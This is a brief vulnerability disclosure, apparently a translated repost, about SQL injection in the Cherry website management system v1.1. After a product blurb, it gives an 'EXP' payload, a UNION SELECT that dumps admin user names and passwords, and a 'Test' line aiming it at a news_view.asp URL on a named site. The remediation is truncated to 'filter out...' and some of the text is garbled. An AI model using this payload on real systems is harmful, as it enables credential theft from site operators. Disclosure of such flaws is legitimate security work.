By Mr. DzY
From www.0855. TV
The cherry website management system v1.1 has been released. Compared with the v1.0 page, It beautifies a lot. It also fixes the Upload Vulnerability of ewebeditor5.5.
But the filtering is not strict, resulting in SQL injection.
V1.0 related: http://www.bkjia.com/Article/201104/87868.html
Cherry enterprise website management system full DIV + CSS template, multi-browser adaptation, Perfect compatibility with IE6-IE8, Firefox, Google and other compliant with the standard browser, template style is centralized in a CSS style, the content and style are completely separated to facilitate website designers to develop templates and manage them. The system is relatively secure. It is designed to prevent injection and shield sensitive characters. News, products, and single-page independent keywords are designed to improve search engine indexing.
EXP:
Union select 1, user_name, password, 4,5, 6,7, 8 from admin
Test:
Asp? Http://www.bkjia.com/news_view.asp? Id = 11 union select 1, user_name, password, 4,5, 6,7, 8 from admin
Fix: filter out...